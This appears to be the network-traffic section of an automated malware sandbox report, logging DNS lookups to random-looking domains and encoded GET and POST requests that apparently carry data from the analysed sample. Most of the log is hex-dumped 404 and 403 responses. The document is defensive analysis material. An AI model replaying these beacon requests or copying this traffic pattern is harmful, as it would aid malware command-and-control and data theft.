                Source: global trafficHTTP traffic detected: GET /aajw/?Qz=BJvp0BdhxXiTCTGP&XbDhGVR=lJ+qR9qEWHtEYfdYXX38H63zdICQzTmBsURfekuXE7iDW/5kFwCD5SzXO8//IXYeWe3pPDw5e3u+RAlULoDse9ZEd7r2QSdjEk66OCO0EG57H2Th8v5BKcw= HTTP/1.1Host: www.comvq.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                Source: global trafficDNS traffic detected: DNS query: www.iuyi542.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vrxlzluy.shop
                Source: global trafficDNS traffic detected: DNS query: www.trifecta.center
                Source: global trafficDNS traffic detected: DNS query: www.wcp95.top
                Source: global trafficDNS traffic detected: DNS query: www.gokulmohan.online
                Source: global trafficDNS traffic detected: DNS query: www.wddb97.top
                Source: global trafficDNS traffic detected: DNS query: www.xtelify.tech
                Source: global trafficDNS traffic detected: DNS query: www.roopiedutech.online
                Source: global trafficDNS traffic detected: DNS query: www.comvq.fun
                Source: global trafficDNS traffic detected: DNS query: www.harmonid.life
                Source: unknownHTTP traffic detected: POST /o91n/ HTTP/1.1Host: www.vrxlzluy.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usCache-Control: no-cacheConnection: closeContent-Length: 204Content-Type: application/x-www-form-urlencodedOrigin: http://www.vrxlzluy.shopReferer: http://www.vrxlzluy.shop/o91n/User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4Data Raw: 58 62 44 68 47 56 52 3d 65 6a 42 61 32 59 47 74 50 65 6f 70 49 41 64 75 6a 74 31 70 61 41 52 33 35 43 58 58 6d 79 61 49 2f 6d 35 59 48 59 6e 51 37 74 4b 51 73 72 2b 5a 48 2b 2b 4c 42 55 48 79 4c 6c 38 66 53 39 67 7a 36 6d 48 4c 42 63 67 65 33 57 75 77 34 2b 45 45 79 62 50 59 56 2b 6f 79 45 77 6b 78 49 74 4d 4b 48 76 58 46 4f 6b 46 61 6d 4e 79 49 57 47 64 58 61 34 6f 4b 74 6c 5a 54 51 56 30 6b 61 68 76 76 4b 50 79 32 4e 74 7a 72 6c 76 62 2f 64 34 73 76 61 48 5a 67 47 52 6c 2f 48 44 66 32 30 55 54 50 51 63 56 72 5a 63 42 5a 75 5a 4f 58 42 4f 65 70 6b 68 69 53 54 32 32 75 34 4d 4c 32 73 61 4f 39 6a 77 3d 3d Data Ascii: XbDhGVR=ejBa2YGtPeopIAdujt1paAR35CXXmyaI/m5YHYnQ7tKQsr+ZH++LBUHyLl8fS9gz6mHLBcge3Wuw4+EEybPYV+oyEwkxItMKHvXFOkFamNyIWGdXa4oKtlZTQV0kahvvKPy2Ntzrlvb/d4svaHZgGRl/HDf20UTPQcVrZcBZuZOXBOepkhiST22u4ML2saO9jw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:43:45 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 18:44:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-litespeed-tag: 59f_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://vrxlzluy.shop/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qi4iazdXf1iKb89srG2XEeCpcZJgKo8iV4%2BAeVMLlEaOYaTWywMWhh2IHd2oqi1aqr5Nek7q%2B%2FH1mBATRGL5FXfLSoPag%2BBlZlfEwWAVgQr2smQnNXbY1lqJAoWaWqBLC1nSAg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbe08b8ce1dddb3-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=730&delivery_rate=0&cwnd=71&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 65 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 09 d0 d0 87 db a6 4d 26 3b 39 f6 a8 cc 38 15 27 b5 b5 65 bb 52 02 3d 68 39 20 b1 92 e8 23 3d fc f7 2d 01 dd 4d 1f 8e 3d de d9 75 2a 09 3c bd 5b ef 92 f0 e5 f1 9b ab d7 9f fe f5 e1 ad 36 91 59 fa f2 e8 52 fd a7 a5 88 26 81 0e d4 fe 7c ad 6b 39 87 98 cc 03 9d 25 be 36 91 32 17 7e b7 cb 92 dc c9 a0 4b c5 89 ae 45 29 12 22 d0 53 86 30 a1 89 2d 88 04 8d 32 fb 5e e8 8a 1d 20 fc f2 e8 87 cb 0c 24 d2 a2 09 e2 02 64 a0 7f fe f4 ce 3e d7 b5 ae 5a 49 09 fd aa 71 48 03 3d e7 2c 26 29 e8 da 84 43 1c e8 4a 96 df Data Ascii: de7is8W`\M&;98'eR=h9 #=-M=u*<[6YR&|k9%62~KE)"S0-2^ $d>ZIqH=,&)CJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:44:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:44:32 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:44:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:44:37 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 01 Nov 2024 18:44:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMc4kej3xsHWVHVyRtzgDEwL97kfIAilrzvQYdNJDZZESasPzZugSaO%2FW1kreJw82UqtBttv0aMYyYbyaw5kgP5nHL%2BT0sNXT7f53e%2FybG1c79frq5SR%2FLc0lR80DBlwlzmSyRsTPBQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbe09ae7a984796-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1243&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 01 Nov 2024 18:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c54i1NTYfqhhNAuc1op9SZ4x6jqIffX33WfLc%2BtZeTnm6Mh%2FrZNgDDN4cJVdHJ5Hifnl7DP1Mz%2FvKAvgc5eSFDO0XMlhrEfvL2BMjv%2FM%2BfqfxVR11oJ2RXem6%2Bp1z16l6S7i42Mx4hQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbe09be9fc30bbb-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1316&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 01 Nov 2024 18:44:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3vjWD25MVEy7ZUnfiBq4G3ol13hgAtEMPPTY5ir%2B%2F4Be1RNjH%2BQPHt9Im7dT0RxVk8VYxmFC28u%2FErpXfZ%2FUcUrZkaWDgmbKsL0gCfBdcpLnM6riUmud%2Fl1syDQREd%2BHw4sZnmgoS0Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbe09ce6fbd2ca9-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10824&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 18:44:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGjIi6Tab%2F8l3z5J0VGzQ%2FzRLyZtkMg1bkOk5JMBOYK0lf9XnHgQIMuIfCjBe0mBJVCzX%2BQfntbkcnkAH8O6Mrd77ym5w62cAkqo6q4cvLndmAdUvT7yZ9LJhYP488xJ2KYFRpn5aD0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbe09de3e80e853-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1370&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=452&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 61 74 20 2f 78 68 37 64 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 4e 45 2c 4e 4f 41 52 43 48 49 56 45 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 2a 20 7b 20 70 61 64 64 Data Ascii: ca8<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at /xh7d/</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padd
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:44:58 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:45:00 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:45:03 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:45:05 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 18:45:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 18:45:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 